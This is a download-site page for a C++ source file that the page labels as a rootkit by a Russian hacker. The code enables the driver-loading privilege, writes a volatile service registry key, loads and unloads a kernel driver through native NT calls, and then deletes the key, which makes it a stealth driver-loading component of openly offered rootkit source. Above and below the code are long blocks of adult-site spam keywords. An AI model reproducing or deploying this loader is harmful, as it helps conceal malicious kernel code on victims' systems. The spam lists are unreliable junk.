亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? ntbootdrivercontrolhide.cpp

?? 爾羅斯著名黑客寫的rootkit
?? CPP
字號:
#define STRICT
#include "NtBootDriverControlHide.hpp"

NtBootDriverControlHide::NtBootDriverControlHide(const WCHAR *lpszDeviceFileName) :
Result(FALSE), m_lpszDeviceFileName(NULL)
{
  if(!lpszDeviceFileName) return;

  m_lpszDeviceFileName = new WCHAR[(wcslen(lpszDeviceFileName))+1];
  if(m_lpszDeviceFileName) 
     wcscpy(m_lpszDeviceFileName, lpszDeviceFileName);
  else
     return;
  Result = TRUE;
}

NtBootDriverControlHide::~NtBootDriverControlHide()
{
  if(m_lpszDeviceFileName)  delete(m_lpszDeviceFileName);
  m_lpszDeviceFileName = 0;
}

BOOLEAN NtBootDriverControlHide::SendCommand(USER_COMMAND *lpUserCommand)
{
  return TRUE;
}

BOOLEAN NtBootDriverControlHide::Start(WCHAR *lpszDeviceName)
{
  if(!lpszDeviceName) return FALSE;

  UNICODE_STRING     str;
  NTSTATUS           NtStatus;
  BOOLEAN            bEnable;
  WCHAR             *lpwszFullServiceName;


  lpwszFullServiceName = QueryFullDeviceName(lpszDeviceName);
  if(!lpwszFullServiceName)
     return FALSE;

  RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE, FALSE, &bEnable);

  RtlInitUnicodeString(&str, lpwszFullServiceName);
  NtStatus = ZwLoadDriver(&str);
  if(!NT_SUCCESS(NtStatus)) 
    {
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
  ReleaseFullDeviceName(lpwszFullServiceName);

  return TRUE;
}

BOOLEAN NtBootDriverControlHide::Stop(WCHAR *lpszDeviceName)
{
  if(!lpszDeviceName) return FALSE;

  UNICODE_STRING     str;
  NTSTATUS           NtStatus;
  BOOLEAN            bEnable;
  WCHAR             *lpwszFullServiceName;

  lpwszFullServiceName = QueryFullDeviceName(lpszDeviceName);
  if(!lpwszFullServiceName)
     return FALSE;

  RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE, FALSE, &bEnable);

  RtlInitUnicodeString(&str, lpwszFullServiceName);
  NtStatus = ZwUnloadDriver(&str);
  if(!NT_SUCCESS(NtStatus)) 
    {
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
  ReleaseFullDeviceName(lpwszFullServiceName);

  return TRUE;
}

BOOLEAN NtBootDriverControlHide::Install(PWSTR lpwszDefaultDeviceName, ULONG ulType, ULONG ulStart, ULONG ulErrorControl, PWSTR lpwszObjectName)
{
  if(!m_lpszDeviceFileName || !lpwszDefaultDeviceName) return FALSE;

  
//  WCHAR              wszDeviceName[64];
//  PWSTR              lpwszDeviceName = 0;
  WCHAR             *lpwszFullServiceName;
  UNICODE_STRING     str, GroupValue;
  OBJECT_ATTRIBUTES  obj;
  ULONG              Disposition, dwData;
  HANDLE             hKey;
  NTSTATUS           NtStatus;

//  if(!wszDefaultDeviceName)
//    {
//     swprintf(wszDeviceName, L"%08X", (ULONG)NtCurrentTeb());
//     lpwszDeviceName = wszDeviceName;
//    }
//  else
//     lpwszDeviceName = wszDefaultDeviceName;
  
  lpwszFullServiceName = QueryFullDeviceName(lpwszDefaultDeviceName);
  if(!lpwszFullServiceName)
     return FALSE;

  RtlInitUnicodeString(&str, lpwszFullServiceName);
  InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
  NtStatus = NtCreateKey(&hKey, KEY_ALL_ACCESS, &obj, 0, NULL, REG_OPTION_VOLATILE, &Disposition);
  if(!NT_SUCCESS(NtStatus)) 
    {
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
//***********************************************************//
  RtlInitUnicodeString(&str, L"Type");
  dwData = ulType;
  NtStatus = NtSetValueKey(hKey, &str, 0, REG_DWORD, &dwData, sizeof(ULONG));
  if(!NT_SUCCESS(NtStatus)) 
    {
     NtClose(hKey);
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }

//***********************************************************//
  RtlInitUnicodeString(&str, L"Start");
  dwData = ulStart;
  NtStatus = NtSetValueKey(hKey, &str, 0, REG_DWORD, &dwData, sizeof(ULONG));
  if(!NT_SUCCESS(NtStatus)) 
    {
     NtClose(hKey);
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
//***********************************************************//
  RtlInitUnicodeString(&str, L"ErrorControl");
  dwData = ulErrorControl;
  NtStatus = NtSetValueKey(hKey, &str, 0, REG_DWORD, &dwData, sizeof(ULONG));
  if(!NT_SUCCESS(NtStatus)) 
    {
     NtClose(hKey);
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
//***********************************************************//
  RtlInitUnicodeString(&str, L"ImagePath");
  RtlInitUnicodeString(&GroupValue, m_lpszDeviceFileName); 
  NtStatus = NtSetValueKey(hKey, &str, 0, REG_SZ, GroupValue.Buffer, GroupValue.Length+sizeof(WCHAR));
  if(!NT_SUCCESS(NtStatus)) 
    {
     NtClose(hKey);
     ReleaseFullDeviceName(lpwszFullServiceName);
     return FALSE;
    }
//***********************************************************//
  if (lpwszObjectName != NULL)
  {
    RtlInitUnicodeString(&str, L"ObjectName");
    RtlInitUnicodeString(&GroupValue, lpwszObjectName); 
    NtStatus = NtSetValueKey(hKey, &str, 0, REG_SZ, GroupValue.Buffer, GroupValue.Length+sizeof(WCHAR));
    if (!NT_SUCCESS(NtStatus)) 
    {
      NtClose(hKey);
      ReleaseFullDeviceName(lpwszFullServiceName);
      return FALSE;
    }
  }
//***********************************************************//
  NtClose(hKey);

//  Start(lpwszFullServiceName);
//  Stop(lpwszFullServiceName);
//  Remove(lpwszFullServiceName);

  ReleaseFullDeviceName(lpwszFullServiceName);

  return TRUE;
}

BOOLEAN NtBootDriverControlHide::Remove(WCHAR *lpszDeviceName)
{
  if(!lpszDeviceName) return FALSE;

  WCHAR             *lpwszFullServiceName;

  lpwszFullServiceName = QueryFullDeviceName(lpszDeviceName);
  if(!lpwszFullServiceName)
     return FALSE;

  BOOLEAN bRes = DeleteKey(lpwszFullServiceName);
  ReleaseFullDeviceName(lpwszFullServiceName);

  return bRes;
}

BOOLEAN NtBootDriverControlHide::DeleteKey(WCHAR *lpszKeyName)
{
  if(!lpszKeyName) return FALSE;

  UNICODE_STRING     str;
  HANDLE             hKey;
  OBJECT_ATTRIBUTES  obj;
  NTSTATUS           NtStatus;
  CHAR               Buf[512];
  ULONG              dwRealLen;

  RtlInitUnicodeString(&str, lpszKeyName);
  InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
  NtStatus = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obj);
  if(!NT_SUCCESS(NtStatus)) 
    {
     return FALSE;
    }

  memset(Buf, 0, sizeof(Buf));
  NtStatus = NtQueryKey(hKey, KeyFullInformation, Buf, sizeof(Buf), &dwRealLen);
  if(NT_SUCCESS(NtStatus)) 
    {
     PKEY_FULL_INFORMATION pKeyFullInfo = (PKEY_FULL_INFORMATION) Buf;
     ULONG Values = pKeyFullInfo->Values;
     ULONG SubKeys = pKeyFullInfo->SubKeys;
     ULONG i;

     for(i=0; i<Values; i++)
        {
         memset(Buf, 0, sizeof(Buf));
         NtStatus = NtEnumerateValueKey(hKey, 0, KeyValueBasicInformation, Buf, sizeof(Buf), &dwRealLen);
         if(NT_SUCCESS(NtStatus))
           {
            PKEY_VALUE_BASIC_INFORMATION pValueBasicInfo = (PKEY_VALUE_BASIC_INFORMATION) Buf;
            RtlInitUnicodeString(&str, pValueBasicInfo->Name);
            ZwDeleteValueKey(hKey, &str);
           }
        }
     for(i=0; i<SubKeys; i++)
        {
         memset(Buf, 0, sizeof(Buf));
         NtStatus = NtEnumerateKey(hKey, 0, KeyBasicInformation, Buf, sizeof(Buf), &dwRealLen);
         if(NT_SUCCESS(NtStatus))
           {
            PKEY_BASIC_INFORMATION pKeyBasicInfo = (PKEY_BASIC_INFORMATION) Buf;
            WCHAR BufName[512];
            swprintf(BufName, L"%s%c%s", lpszKeyName, OBJ_NAME_PATH_SEPARATOR, pKeyBasicInfo->Name);
            DeleteKey(BufName);
           }
        }
    }

  ZwDeleteKey(hKey);
  NtClose(hKey);

  return TRUE;
}

PWSTR NtBootDriverControlHide::QueryFullDeviceName(PWSTR lpwszDeviceName)
{
  if(!lpwszDeviceName)
     return NULL;

  PWSTR lpwszFullServiceName = new WCHAR [wcslen(L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\") + wcslen(lpwszDeviceName) + 1];
  if(!lpwszFullServiceName)
     return NULL;
  swprintf(lpwszFullServiceName, L"%s%s", L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\", lpwszDeviceName);

  return lpwszFullServiceName;
}


BOOLEAN NtBootDriverControlHide::ReleaseFullDeviceName(PWSTR lpwszFullDeviceName)
{
  if(!lpwszFullDeviceName) 
     return FALSE;

  delete[] lpwszFullDeviceName;

  return TRUE;
}
 
   void* _cdecl operator new(size_t size)
   { 
    NTSTATUS           NtStatus;
    ULONG              ulSize = size;
    PVOID              lpBuf = 0;

    NtStatus = NtAllocateVirtualMemory((HANDLE)-1, &lpBuf, 0, &ulSize, MEM_COMMIT, PAGE_READWRITE);
    if(!NT_SUCCESS(NtStatus)) 
       lpBuf = 0;

    return lpBuf; 
   };
   void  _cdecl operator delete(void* p)
   {
    NTSTATUS           NtStatus;
    ULONG              ulSize = 0;

    if(p)
       NtStatus = NtFreeVirtualMemory((HANDLE)-1, &p, &ulSize, MEM_RELEASE);
   };

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲一区二区欧美日韩| 国产精品久久久久久亚洲毛片| 日韩欧美国产电影| 国产精品久久久久三级| 日韩福利视频网| 91视频国产观看| 精品久久五月天| 天堂久久久久va久久久久| 国产福利一区二区三区视频在线 | 国产精品18久久久| 欧美日精品一区视频| 国产精品丝袜一区| 激情综合网最新| 久久综合丝袜日本网| 久久久国产一区二区三区四区小说| 综合激情网...| 国产毛片精品视频| 91精品欧美久久久久久动漫| 亚洲精品大片www| 波多野结衣欧美| 国产日韩欧美在线一区| 精品无人区卡一卡二卡三乱码免费卡 | 久久99精品久久只有精品| 在线中文字幕不卡| 国产清纯在线一区二区www| 麻豆精品视频在线| 日韩一区二区三区在线| 日本特黄久久久高潮| 亚洲精品国产一区二区三区四区在线 | 欧美日韩久久久久久| 中文字幕一区二区三区av| 成人自拍视频在线| 国产色综合久久| 成人毛片在线观看| 最新国产精品久久精品| 99久久99久久久精品齐齐 | 337p粉嫩大胆噜噜噜噜噜91av| 99国产精品视频免费观看| 久久亚洲捆绑美女| 国产在线一区观看| 国产校园另类小说区| 成人性生交大合| ●精品国产综合乱码久久久久 | 欧美色中文字幕| 国产一区二区三区免费在线观看| 欧美成人vr18sexvr| 免费成人小视频| 久久久影视传媒| 成人av资源在线观看| 一区二区三区色| 欧美久久久久中文字幕| 久久国产三级精品| 久久久综合视频| 成人av中文字幕| 亚洲一区视频在线| 欧美成人video| 国产精品一区二区不卡| 国产精品另类一区| 欧美在线观看你懂的| 美女一区二区三区| 欧美激情一区三区| 欧美天堂一区二区三区| 狠狠色丁香久久婷婷综合_中| 日本一区二区三区免费乱视频| 91小视频免费看| 日韩国产在线一| 国产精品国产三级国产有无不卡| 91成人在线观看喷潮| 裸体一区二区三区| 亚洲人成伊人成综合网小说| 欧美肥胖老妇做爰| 成人性生交大片免费看在线播放| 午夜a成v人精品| 日本一区二区三区免费乱视频| 欧美综合色免费| 国产福利不卡视频| 日韩va亚洲va欧美va久久| 国产亚洲欧美日韩日本| 欧美日韩成人高清| www.爱久久.com| 美女视频黄频大全不卡视频在线播放 | 精品一区二区日韩| 亚洲综合色自拍一区| 久久一区二区视频| 欧美精品免费视频| 91网址在线看| 国产剧情一区二区| 免费在线成人网| 夜夜嗨av一区二区三区网页 | 国产91在线看| 亚洲va中文字幕| 国产精品福利在线播放| 日韩美女一区二区三区四区| 91国产成人在线| 不卡一二三区首页| 国产精品亚洲一区二区三区在线 | 久久国产精品一区二区| 亚洲国产精品久久久久秋霞影院 | 亚洲国产aⅴ成人精品无吗| 久久久777精品电影网影网| 欧美一区二区女人| 欧美色综合天天久久综合精品| 东方aⅴ免费观看久久av| 久久se精品一区二区| 日韩成人av影视| 午夜免费久久看| 亚洲一区二区欧美| 亚洲小说欧美激情另类| 亚洲你懂的在线视频| 国产精品美日韩| 国产精品久久久久久久久晋中| 精品99999| 欧美精品一区视频| 精品免费视频一区二区| 日韩欧美美女一区二区三区| 欧美一区二区三区日韩| 91精品国产综合久久久久| 欧美蜜桃一区二区三区| 欧美人动与zoxxxx乱| 91麻豆精品国产| 欧美一级精品在线| 精品欧美乱码久久久久久1区2区| 日韩欧美国产一区在线观看| 欧美刺激午夜性久久久久久久 | 亚洲人妖av一区二区| 1000精品久久久久久久久| 亚洲精品国产一区二区三区四区在线| 亚洲欧美日韩中文播放 | 884aa四虎影成人精品一区| 欧美色中文字幕| 日韩一级欧美一级| 久久这里只精品最新地址| 久久精品人人做人人爽97| 中文字幕一区二区视频| 亚洲最新在线观看| 久久精品国产亚洲5555| 国产盗摄女厕一区二区三区| 丁香婷婷综合色啪| 91福利精品视频| 欧美成人在线直播| 中文字幕电影一区| 亚洲综合精品自拍| 久久精品国产99| 成人免费看黄yyy456| 在线观看免费一区| 日韩三级中文字幕| 国产精品久久久久久久久免费相片| 亚洲综合在线电影| 99这里只有久久精品视频| 国产欧美一区二区精品忘忧草| 久久精品在线免费观看| 亚洲国产精品黑人久久久| 亚洲精品大片www| 麻豆专区一区二区三区四区五区| 国产电影一区在线| 欧美日韩亚洲另类| 国产日韩av一区| 香蕉乱码成人久久天堂爱免费| 国产中文字幕一区| 欧美亚洲国产一区在线观看网站| 日韩美一区二区三区| 亚洲精品免费在线观看| 九九久久精品视频| 成人黄色在线看| 日韩视频一区在线观看| 一区二区理论电影在线观看| 韩国女主播成人在线| 欧美亚洲高清一区| 国产精品国产a级| 久热成人在线视频| 欧美日韩成人一区| 中文字幕一区二区三区在线播放| 日本人妖一区二区| 91麻豆国产福利精品| 国产网站一区二区三区| 亚洲国产一区二区视频| 国产欧美日韩亚州综合 | 91在线视频播放| 精品蜜桃在线看| 亚洲超碰97人人做人人爱| 99天天综合性| 久久女同精品一区二区| 蜜桃视频在线观看一区| 欧美日本在线观看| 一区二区三区欧美激情| 不卡的av中国片| 国产日韩成人精品| 韩国成人精品a∨在线观看| 欧美一区二区三区影视| 视频一区国产视频| 欧美亚洲另类激情小说| 亚洲最新视频在线播放| 色诱亚洲精品久久久久久| 亚洲国产精品激情在线观看| 国产麻豆欧美日韩一区| 久久久精品人体av艺术| 国产一区二区三区四区五区入口| 精品成人一区二区三区| 精品一二三四区| 26uuu国产一区二区三区|